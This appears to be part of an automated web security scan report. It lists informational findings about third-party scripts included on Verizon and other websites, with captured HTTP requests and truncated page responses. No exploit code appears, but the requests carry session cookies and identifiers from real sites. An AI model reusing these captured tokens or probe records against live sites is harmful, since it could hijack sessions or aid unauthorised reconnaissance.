CONVIO.referrer=http%3A//newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:17 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e3145525d5f4f58455e445a4a4214f4;expires=Mon, 05-Sep-2011 23:43:17 GMT;path=/;httponly
Content-Length: 115137

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="generator" content="Convio CMS" />
<script language="JavaScrip
...[SNIP]...

<script type="text/javascript" src="http://vznews.convio.net/js/utils.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://vznews.convio.net/css/FunctionalStyles.css" />
<script type="text/javascript" src="http://vznews.convio.net/yui3/yui/yui-min.js"></script>
<script type="text/javascript" src="http://vznews.convio.net/js/utils.js"></script>
<script type="text/javascript" src="http://vznews.convio.net/js/convio/modules.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://cmsadmin30.convio.net/system/auth/author-toolbar.jsp?hostID=136168508"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.14. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newscenter.verizon.com
Path:	/fact-sheets/verizon-high-speed-internet.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://vznews.convio.net/js/convio/modules.js
http://vznews.convio.net/js/utils.js
http://vznews.convio.net/yui3/yui/yui-min.js
http://www.google-analytics.com/urchin.js
https://cmsadmin30.convio.net/system/auth/author-toolbar.jsp?hostID=136168508

Request

GET /fact-sheets/verizon-high-speed-internet.html HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=U1BlTuKkG8bkiAKp37G7Cg&start=20&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:14 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e0f45525d5f4f58455e445a4a4214f4;expires=Mon, 05-Sep-2011 23:43:14 GMT;path=/;httponly
Content-Length: 125028

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="generator" content="Convio CMS" />
<script language="JavaScrip
...[SNIP]...

<script type="text/javascript" src="http://vznews.convio.net/js/utils.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://vznews.convio.net/css/FunctionalStyles.css" />
<script type="text/javascript" src="http://vznews.convio.net/yui3/yui/yui-min.js"></script>
<script type="text/javascript" src="http://vznews.convio.net/js/utils.js"></script>
<script type="text/javascript" src="http://vznews.convio.net/js/convio/modules.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://cmsadmin30.convio.net/system/auth/author-toolbar.jsp?hostID=136168508"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.15. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.verizononline.com
Path:	/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N2870.vznbiz/B3160296;abr=!ie;sz=300x300;ord=571859577?

Request

Response

16.16. http://phones.verizonwireless.com/htc/thunderbolt/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://phones.verizonwireless.com
Path:	/htc/thunderbolt/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js
https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js
https://globalnav.vzw.com/scripts/motionpoint.js
https://scache.vzw.com/globalnav/globalnav.js
https://scache.vzw.com/scripts/accessible/mootools.js
https://scache.vzw.com/scripts/homepage/swfobject.js

Request

GET /htc/thunderbolt/ HTTP/1.1
Host: phones.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 14 Jul 2011 02:52:27 GMT
Accept-Ranges: bytes
ETag: "ec1b210d141cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 8159
Date: Mon, 05 Sep 2011 22:19:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
<t
...[SNIP]...
</script>

<script type="text/javascript" src="https://globalnav.vzw.com/scripts/motionpoint.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>

<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
...[SNIP]...

16.17. http://products.verizonwireless.com/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://products.verizonwireless.com
Path:	/index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js
https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js
https://scache.vzw.com/globalnav/globalnav.js
https://scache.vzw.com/scripts/accessible/mootools131.js
https://seal.verisign.com/getseal?host_name=getitnow.vzwshop.com&size=S&use_flash=NO&use_transparent=YES&lang=en
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /index.aspx HTTP/1.1
Host: products.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=75545
Date: Mon, 05 Sep 2011 22:35:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head><title>
Media from Verizon Wireless - Media from Verizon Wi
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
...[SNIP]...
<div id="legal">
<script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en"
type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=getitnow.vzwshop.com&size=S&use_flash=NO&use_transparent=YES&lang=en"></script>
...[SNIP]...

16.18. http://search.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.verizon.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js
http://content.atomz.com/pb00002f7b/publish/includes/js/search.js
http://content.atomz.com/pb00002f7b/publish/includes/js/tip_balloon.js
http://content.atomz.com/pb00002f7b/publish/includes/js/wz_tooltip.js
http://www.verizonbusiness.com/(none18:52:08)/templates/vzbar/site.js
http://www.verizonbusiness.com/(none20:54:40)/templates/vzbcann/site.js
http://www.verizonbusiness.com/templates/hbx.js

Request

Response

16.19. http://search.vzw.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.vzw.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.atomz.com/pb00002f7b/publish/sp_includes/scripts/dropdown.js
http://content.atomz.com/pb00002f7b/publish/sp_includes/scripts/global_search_results.js
http://www.verizonwireless.com/js/shared/hbx/hbx.js

Request

GET / HTTP/1.1
Host: search.vzw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:40 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Connection: close
Content-Length: 79416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Verizon Wireless Se
...[SNIP]...
</script>

   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/sp_includes/scripts/dropdown.js"></script>
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/sp_includes/scripts/global_search_results.js"></script>
...[SNIP]...
</script><script language="javascript1.1" src="http://www.verizonwireless.com/js/shared/hbx/hbx.js"></script>
...[SNIP]...

16.20. http://shop.verizonwireless.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.verizonwireless.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.atomz.com/content/pb00003783/publish/htdocs/search.js
http://www.google-analytics.com/urchin.js
https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js
https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js
https://scache.vzw.com/globalnav/globalnav.js
https://scache.vzw.com/scripts/accessible/mootools131.js
https://scache.vzw.com/scripts/homepage/swfobject.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET / HTTP/1.1
Host: shop.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:45 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Connection: close
Content-Length: 47467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>





<script type="text/javascript" src="http://content.atomz.com/content/pb00003783/publish/htdocs/search.js"></script>

<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
...[SNIP]...
<div class="footerIcons">
<script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...

16.21. http://smallbusiness.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smallbusiness.verizon.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=rgadevtest

Request

GET / HTTP/1.1
Host: smallbusiness.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 05 Sep 2011 22:16:23 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 125219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<head>
<t
...[SNIP]...
services to meet your organization's needs. Get connected to one of the most largest networks in the country so you can focus more on day-to-day operations without worrying about reliability." />

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=rgadevtest"></script>
...[SNIP]...

16.22. http://smallbusiness.verizon.com/products/voice/overview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smallbusiness.verizon.com
Path:	/products/voice/overview.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=rgadevtest

Request

GET /products/voice/overview.aspx HTTP/1.1
Host: smallbusiness.verizon.com
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; ASP.NET_SessionId=lhx45c55scwk1s45ya0xy155; BusinessUnit=business; vsrecentsearches=xss%20sq~~~~

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 05 Sep 2011 22:17:23 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 130281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<head>
<t
...[SNIP]...
scription" content="Boost your business operations with reliable phone solution from Verizon Voice. Explore service plans, calling features, and equipment that fit your business calling needs." />

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=rgadevtest"></script>
...[SNIP]...

16.23. http://smallbusiness.verizon.com/products/voice/plans.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smallbusiness.verizon.com
Path:	/products/voice/plans.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=rgadevtest

Request

GET /products/voice/plans.aspx HTTP/1.1
Host: smallbusiness.verizon.com
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/overview.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; ASP.NET_SessionId=lhx45c55scwk1s45ya0xy155; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 05 Sep 2011 22:22:01 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 196316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<head>
<t
...[SNIP]...
content="Every business has its unique phone requirements. Explore local, nationwide, & international calling plans from Verizon Voice and choose the one that fits your needs & budget." />

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=rgadevtest"></script>
...[SNIP]...

16.24. https://survey.qualtrics.com/SE/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://survey.qualtrics.com
Path:	/SE/

Issue detail

The response dynamically includes the following scripts from other domains:

https://a248.e.akamai.net/img.qualtrics.com/WRQualtricsShared/JavaScript/javascriptRequired.22262.js
https://a248.e.akamai.net/img.qualtrics.com/WRQualtricsShared/JavaScript/javascriptSE.22262.js

Request

GET /SE/ HTTP/1.1
Host: survey.qualtrics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 05 Sep 2011 22:35:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Expires: Mon, 05 Sep 2011 22:35:56 GMT
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
ServerAddr: 192.168.1.29
Content-Length: 3874
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="">

<!-- *** WEB SITE INFORMATION AND COPYRIGHT ********************************************
...[SNIP]...
<link rel="apple-touch-icon-precomposed" href="../WRQualtricsShared/Graphics/qipadicon.png"/>

<script type="text/javascript" src="https://a248.e.akamai.net/img.qualtrics.com/WRQualtricsShared/JavaScript/javascriptRequired.22262.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/img.qualtrics.com/WRQualtricsShared/JavaScript/javascriptSE.22262.js"></script>
...[SNIP]...

16.25. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The response dynamically includes the following script from another domain:

http://cache.addthiscdn.com/www/20110825162931/js/bookmark.js

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92777

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/20110825162931/js/bookmark.js"></script>
...[SNIP]...

16.26. http://www.connecttoverizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js
http://www.whitefence.com/static/Seymour.js
http://www.whitefence.com/static/mrc.js
http://www.whitefence.com/static/omniture.js
https://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:14 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:19:14 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 32212

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Order Verizon Phone,
...[SNIP]...
<LINK REL="SHORTCUT ICON" HREF="http://www.connecttoverizon.com/favicon.ico">
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/static/mrc.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/static/Seymour.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

<script type="text/javascript" language="Javascript" src="http://www.whitefence.com/static/omniture.js"></script>
...[SNIP]...

16.27. http://www.connecttoverizon.com/loginFailed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/loginFailed.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.whitefence.com/scripts/moo/mootools.v1.2b2.js
http://www.whitefence.com/static/mrc.js
http://www.whitefence.com/static/omniture.js

Request

Response

16.28. http://www.connecttoverizon.com/order-now.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/order-now.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.whitefence.com/scripts/client/AddyAjax.auto.js
http://www.whitefence.com/scripts/client/JsonP.js
http://www.whitefence.com/scripts/moo/mootools.v1.2b2.js
http://www.whitefence.com/static/mrc.js
http://www.whitefence.com/static/omniture.js

Request

GET /order-now.html HTTP/1.1
Host: www.connecttoverizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:08 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:36:08 GMT
X-Powered-By: PHP/5.2.3
Connection: close
Content-Type: text/html
Content-Length: 13969

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ConnectToVerizon
...[SNIP]...
<LINK REL="SHORTCUT ICON" HREF="http://www.connecttoverizon.com/favicon.ico">

<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/static/mrc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/scripts/moo/mootools.v1.2b2.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/scripts/client/JsonP.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/scripts/client/AddyAjax.auto.js"></script>
...[SNIP]...

<script type="text/javascript" language="Javascript" src="http://www.whitefence.com/static/omniture.js"></script>
...[SNIP]...

16.29. http://www.darkreading.com/security/attacks/showArticle.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.darkreading.com
Path:	/security/attacks/showArticle.jhtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/node.pli?pub=ubm
http://content.dl-rms.com/rms/mother/19171/nodetag.js
http://i.cmpnet.com/informationweek/js/jquery-1.2.6.min.js
http://i.cmpnet.com/informationweek/nop/popup.js
http://i.cmpnet.com/shared/omniture/h_s_code_remote.js
http://i.cmpnet.com/techweb/scripts/ddtabmenu.js
http://i.techweb.com/darkreading/detect.js
http://twimgs.com/informationweek/elqNow/elqCfg.js
http://twimgs.com/informationweek/elqNow/elqImg.js

Request

GET /security/attacks/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 05 Sep 2011 22:36:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=aHFlcnBxYTE5ZmU2aGVmdmF0OWFxM25vYzE%3D; expires=Mon, 05-Sep-2011 22:38:09 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://www.darkreading.com/security/attacks/showArticle.jhtml&gateway=true
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
